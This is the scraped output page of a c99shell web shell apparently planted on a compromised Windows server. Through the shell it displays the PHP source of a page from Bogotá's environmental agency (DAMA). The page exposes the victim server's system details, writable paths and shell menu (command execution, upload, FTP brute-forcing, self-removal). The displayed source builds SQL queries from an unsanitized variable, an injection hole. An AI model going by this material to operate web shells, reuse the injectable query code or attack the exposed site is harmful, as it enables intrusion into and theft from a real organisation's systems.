!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ee1.php (7.16 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Ecosistemas Estrat&eacute;gicos y Biodiversidad</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body background="ee/f.gif" link="#003366" vlink="#003366" alink="#003366" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr> 
    <td width="128"><img src="ee/1.gif" width="141" height="98"></td>
    <td align="left"><img src="ee/2.gif" width="612" height="98"></td>
  </tr>
  <tr> 
    <td width="128" valign="top" background="ee/f.gif" bgcolor="#FCF5C7"> 
      <p><img src="ee/c.gif" width="141" height="30"><font face="Verdana, Arial, Helvetica, sans-serif"> 
      <table width="120" border="0" cellspacing="0" cellpadding="4">
        <tr> 
          <td colspan="2" valign="top"> 
            <?php
		  include('reqcollap.php');
		  ?>
          </td>
        </tr>
      </table>
      </font></p> </td>
    <td rowspan="2" valign="top"> 
      <table width="100%" border="0" cellspacing="0" cellpadding="8">
        <tr> 
          <td width="600" rowspan="2"><table width="100%" border="1" cellpadding="6" cellspacing="0" bordercolor="#FFFFFF" bgcolor="#F2E3C6">
              <tr> 
                <?php
		  require('conexion3.php');
			$hora = getdate();
			$yr = $hora["year"];
			$mo = $hora["mon"];
			$dy = $hora["mday"];
			
			$mo = $mo * 100;
			$yr = $yr - 2000;
			$yr = $yr * 10000;
			$fc = $mo + $yr;
			$fc1 = $fc + 100;
			//echo $fc;
			//echo $fc1;
			//$fc = $mo + $yr + $dy;
			$consul = "SELECT *
			FROM news where fecha<'$fc1' and cat=12"
			. " order by fecha DESC";
			$result = mysql_query($consul,$db);
			$num_filas = mysql_num_rows($result);
			while ($myrow = mysql_fetch_array($result))
			{
			$idacc1 = $myrow["id"];
			$descriacc1 = $myrow["descri"];
			$catacc1 = $myrow["cat"];
			$fechara = $myrow["fecha"];
			$tax = $myrow["texto"];
			$titularacc1 = $myrow["titular"];
			$anne = $fechara / 10000;
			$anne = intval($anne);
			$ap = $anne + 2000;
			$rf = $anne * 10000;
			$fechara = $fechara - $rf;
			$mun = $fechara / 100;
			$mun = intval($mun);
			$mp = $mun;
			$rfa = $mun * 100;
			$dya = $fechara - $rfa;
			$frj = strlen($tax);
			if ($frj > 150) {
			$resto = substr ("$tax", 0, 200); 
			}else{
			$resto = $tax;
			}
			$resto = str_replace("\n", "<br>", $resto);

			
			
			$veri1 = 1;
			if ($veri1 == 1) {
			?>
                <td valign="top">
<table width="550" border="0" cellpadding="6" cellspacing="0" bordercolor="#F2E3C6">
                    <tr> 
                      <?php
		  include('conect/conect.php');
			$consul = "SELECT *
			FROM links where temas_id like '%$titix-%' or temas_id like '%$titix'"
			. " order by priority DESC,id,nombre";
			$result = mysql_query($consul,$db);
			$num_filas = mysql_num_rows($result);
			//echo $num_filas;
			$consula = "SELECT *
			FROM cate where tema_id like '$titix'";
			$resulta = mysql_query($consula,$db);
			$num_filasa = mysql_num_rows($resulta);
			$myrowa = mysql_fetch_array($resulta);
			$fidel = $myrowa["tema_desc"];
			?>
                      <td> <p><strong><font size="4" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $fidel; ?></font></strong></p>
                        <table width="550" border="0" cellspacing="0" cellpadding="4">
                          <?php
			while ($myrow = mysql_fetch_array($result))			
			{
			$lid = $myrow["id"];
					$lnombre = $myrow["nombre"];
					$ldescripcion = $myrow["descripcion"];
					$ldescripcion = str_replace("\n", "<br>", $ldescripcion);
					$ltipo_info = $myrow["tipo_info"];
					$llink = $myrow["link"];
					$lentidad_id = $myrow["entidad_id"];
					$lgraphic = $myrow["graphic"];
					$lfotolink = $myrow["foto_link"];
					$lsuj_a_fecha = $myrow["suj_a_fecha"];
					$lfecha = $myrow["fecha"];
					$lalcance = $myrow["alcance"];
					$ldis = $myrow["dis"];
					$lmes = $myrow["mes"];
					$ltemas_id = $myrow["temas_id"];
					$bodytag = str_replace("reqpml3", "reqresta3", $llink);

			?>
                          <tr> 
                            <td valign="top"><font face="Verdana, Arial, Helvetica, sans-serif"> 
                              <?php
					  if ($lgraphic == 1) {
					  $sof = $lfotolink;
					  $br = 1;
					  }else{
					  $sof = "none.gif";
					  $br = 0;
					  }
					  ?>
                              <img src="<?php echo $sof; ?>" border="<?php echo $sof; ?>"></font></td>
                          </tr>
                          <tr> 
                            <td valign="top"> <p align="justify"><img src="cflee.gif"><font face="Verdana, Arial, Helvetica, sans-serif"><font size="2"><strong> 
                                <a href="<?php echo $bodytag; ?>"><?php echo $lnombre; ?></a></strong></font><br>
                                <font color="#666666" size="2"><?php echo $ldescripcion; ?></font></font><br>
                                <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><font color="#339900"><a href="#"> 
                                </a></font><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
                                <?php
						  if ($llink != "#") { ?>
                                <img src="flege.gif" width="9" height="12"></font> 
                                <font color="#339900"><a href="<?php echo $bodytag; ?>">Ver 
                                el documento o ir al vinculo...</a></font> 
                                <?php } ?>
                                </font></p></td>
                          </tr>
                          <tr bgcolor="#FFFFFF"> 
                            <td valign="top" bgcolor="#F2E3C6"><img src="linpune.gif" width="540" height="1"></td>
                          </tr>
                          <?php } ?>
                        </table>
                        <p><img src="cfle.gif"> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><?php echo $num_filas; ?></strong> 
                          Documentos o vinculos encontrados...</font><br>
                          <img src="contenfoother2.gif" width="550" height="16"><br>
                          <a href="mailto:sistemas@dama.gov.co"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Sistemas@dama.gov.co</font></a></p></td>
                    </tr>
                  </table> 
                </td>
                <?php }} ?>
              </tr>
            </table></td>
          <td>&nbsp;</td>
        </tr>
        <tr> 
          <td>&nbsp;</td>
        </tr>
      </table></td>
  </tr>
  <tr> 
    <td width="128" valign="top" background="ee/f.gif">&nbsp;</td>
  </tr>
  <tr> 
    <td width="128"><font face="Verdana, Arial, Helvetica, sans-serif">&gt;&gt; 
      </font></td>
    <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Todos los 
      Derechos Reservados para el DAMA, Departamento T&eacute;cnico Administrativo 
      del Medio Ambiente<br>
      Sistema de Informaci&oacute;n Ambiental SIA-DAMA, 1998-2004, Bogot&aacute;, 
      Colombia. </font></td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--